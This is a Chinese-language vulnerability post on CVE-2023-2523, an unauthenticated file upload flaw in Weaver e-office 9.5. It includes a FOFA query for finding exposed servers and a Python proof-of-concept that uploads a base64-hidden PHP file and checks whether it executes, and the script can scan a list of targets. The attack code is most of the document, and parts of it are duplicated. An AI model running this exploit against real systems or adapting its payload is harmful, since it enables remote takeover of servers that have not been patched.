泛微e-office任意文件上传

漏洞详情

泛微e-office 9.5版本，源文件 App/Ajax/ajax.php?action=mobile_upload_save 的一些未知功能存在问题。 参数 upload_quwan 的操作导致不受限制的上传，未经身份验证的恶意攻击者通过上传恶意文件，从而获取目标服务器的控制权限
cve-2023-2523

影响版本

泛微e-office 9.5版本

fofa

FOFA:app="泛微-EOffice"

POC

def POC(url):
    url1 = url + '/E-mobile/App/Ajax/ajax.php?action=mobile_upload_save'

    # 设置请求头
    headers = {
        'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
    }

    # 设置表单数据
    data = 'LS0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5ZFJWQ0dXcTRDeDNTcTZ0dApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InVwbG9hZF9xdXdhbiI7IGZpbGVuYW1lPSJ0ZXN0LnBocC4iCkNvbnRlbnQtVHlwZTogaW1hZ2UvanBlZwoKPD9waHAgcHJpbnQoMjU2KiAyNTYpOyB1bmxpbmsoX19GSUxFX18pOz8+Ci0tLS0tLVdlYktpdEZvcm1Cb3VuZGFyeWRSVkNHV3E0Q3gzU3E2dHQKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJmaWxlIjsgZmlsZW5hbWU9IiIKQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0KIAogCi0tLS0tLVdlYktpdEZvcm1Cb3VuZGFyeWRSVkNHV3E0Q3gzU3E2dHQtLQ=='

    try:
        response = requests.post(url1, headers=headers, data=base64.b64decode(data),  timeout=2)
        matches = re.findall(r"(\d{10})", response.text)
        url = url + "/attachment/" + matches[1] + "/test.php"
        resp = requests.get(url)
        if resp.status_code == 200 and "65536" in resp.text:
            print("vulning !!!!!!!!!!!!!")
        else:
            print ("vuln not exists")
    except Exception as e:
        print (e)
        print ("连接失败")
def filter_url_path(url):
    # 以两个斜杠//为位置分割URL
    parts1 = url.split("//")
    ip = parts1[1]
    parts2 = ip.split("/")
    if len(parts2)>0:
        url = parts1[0]+"//"+parts2[0]
        return url
    else:
        url = parts1+"//"+parts2

#文件读取URL
def process_file(file_path):
    with open(file_path, "r") as file:
        for line in file:
            url = line.strip()  # 去掉行尾的换行符
            POC(url)
#净化URL格式为http://xxx.xxx.xxx:xxx
def filter_url_path(url):
    # 以两个斜杠//为位置分割URL
    parts1 = url.split("//")
    ip = parts1[1]
    parts2 = ip.split("/")
    if len(parts2)>0:
        url = parts1[0]+"//"+parts2[0]
        return url
    else:
        url = parts1+"//"+parts2

#文件读取URL
def process_file(file_path):
    with open(file_path, "r") as file:
        for line in file:
            url = line.strip()  # 去掉行尾的换行符
            POC(url)

if __name__ == '__main__':
    args = sys.argv[1:]
    if not args:
        print("Please provide a URL or file path as an argument.")
    else:
        proxies = {
            "http": "http://127.0.0.1:8080",
            "https": "https://127.0.0.1:8080"
        }
        first_arg = args[0]
        if first_arg.startswith("http"):
            POC(first_arg)
        else:
            process_file(first_arg)

 

修复建议

目前厂商暂未发布修复措施解决此安全问题，建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法： https://global.weaver.com.cn/website/en/eoffice.html

 个人公众号随时更新最新漏洞POC，有需要请关注：